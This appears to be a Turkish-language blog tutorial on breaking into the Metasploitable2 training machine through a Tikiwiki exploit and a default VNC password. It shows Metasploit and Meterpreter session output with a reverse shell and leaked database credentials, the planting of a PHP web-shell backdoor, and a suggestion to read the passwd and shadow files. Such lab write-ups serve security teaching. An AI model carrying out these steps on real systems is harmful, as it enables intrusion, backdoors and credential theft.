Ekim 19, 2021
11 11 11 ÖÖ
TCP nedir ? Aktarım Katmanı 2
Aktarım Katmanı Tcp Nedir
Yönlendirme Nedir 2 ?
Yönlendirme Nedir ?
Ağ Katmanı Nedir 2 ?
Ağ Katmanı Nedir ?
Veri Bağı Katmanı Nedir 2 ?
Android Studio Nasıl Kurulur ?
Veri Bağı Katmanı Nedir ?
Fiziksel Katman Nedir ?
Son Yazılar
TCP nedir ? Aktarım Katmanı 2 Aktarım Katmanı Tcp Nedir Yönlendirme Nedir 2 ? Yönlendirme Nedir ? Ağ Katmanı Nedir 2 ? Ağ Katmanı Nedir ? Veri Bağı Katmanı Nedir 2 ? Android Studio Nasıl Kurulur ? Veri Bağı Katmanı Nedir ? Fiziksel Katman Nedir ?
metasploitable2 exploit

Tikiwiki – Vnc Zafiyeti Nasıl Sızılır ?

Paylaşım , Takip İçin

Tikiwiki web tabanlı çalışan bir içerik yönetim sistemidir. Bizde bu sisteme sızmayı deneyeceğiz. İlk olarak metasploit frameworküne giriş yapıyoruz. Daha sonrasında search tikiwiki diyerek explotimizi seçeceğiz. Ve daha sonrasında gerekli parametreleri girerek shellimize ulaşmış olacağız.

msf6 exploit(tikiwiki_graph_formula_exec) > exploit

[*] Started reverse handler on 192.168.138.128:4444

[*] Attempting to obtain database credentials…

[*] The server returned        : 200 OK

[*] Server version             : Apache/2.2.8 (Ubuntu) DAV/2

[*] TikiWiki database informations :

 

db_tiki   : mysql

dbversion : 1.9

host_tiki : localhost

user_tiki : root

pass_tiki :

dbs_tiki  : tikiwiki

 

[*] Attempting to execute our payload…

[*] Sending stage (39217 bytes) to 192.168.138.129

[*] Meterpreter session 1 opened (192.168.138.128:4444 -> 192.168.138.129:55603) at 2013-07-28 11:18:36 +0300

 

meterpreter > sysinfo

Computer : metasploitable

OS      : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

Meterpreter : php/php

 

meterpreter > shell

Process 13125 created.

Channel 0 created.

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

 

Sisteme root olarak giriş yapıldı. Yukarda kullanıcı adının root parolanın boş olduğu görülebilir.

Sisteme shell atarak bir backdoorda açılabilir. Bunun için http://phpshell.sourceforge.net/

deki shell kullanılmıştır. meterpreter ekranında upload yapılır:

 

meterpreter > upload /root/Desktop/phpshell-2.4/config.php /var/www/tikiwiki/backups

[*] uploading  : /root/Desktop/phpshell-2.4/config.php -> /var/www/tikiwiki/backups

[*] uploaded   : /root/Desktop/phpshell-2.4/config.php -> /var/www/tikiwiki/backups/config.php

meterpreter > upload /root/Desktop/phpshell-2.4/phpshell.php  /var/www/tikiwiki/backups

[*] uploading  : /root/Desktop/phpshell-2.4/phpshell.php -> /var/www/tikiwiki/backups

[*] uploaded   : /root/Desktop/phpshell-2.4/phpshell.php -> /var/www/tikiwiki/backups/phpshell.php

 

Phpshellde varsayılan kullanıcı adı ve şifre koyulmamış. Bunun için

config.php yi upload etmeden önce [users]’ın altına kullanıcı_adı = “parola” eklenmelidir.

Upload ettikten sonra tarayıcıdan (upload edilen yere göre değişebilir) kullanıcı adı parola olarak ayarlanan değerler girilip shell ekranına ulaşılabilir  ve istenilen komutlar çalıştırılablir.

vnc

vnc

Nessus taramasında VNC Server ‘password’ Password isminde kritik bir zafiyet keşfetti. Bu zafiyet oldukça kolay bir zafiyettir. Fakat kolay olduğu kadarda zor bulunan bir zafiyettir.

Açıklamada nessusun parola olarak “password” ile vnc bağlantısı yapabildiğimiz söyleniyor. Alttaki kodu girerek ve zafiyetin yapılacağı adresi girerek sızma işlemimize başlayalım.

Şifremizi girdikten sonra bizi aşşağıdaki panele atıyor.

Şimdi meterpreter komutlarımızı veya shell komutlarımızı kullanarak bilgileri alabiliriz. 

Bakıyoruz ve root olarak giriş yapmış bulunuyoruz. Dilerseniz etc içerisine girip cat passwd veya shadow yaparak makinamızın şifresinide bulabilirsiniz.


Paylaşım , Takip İçin
5 1 vote
Article Rating

Bir Cevap Yazın

2 Yorum
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

[…] Tikiwiki […]

[…] Tikiwiki […]

2
0
Would love your thoughts, please comment.x
()
x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: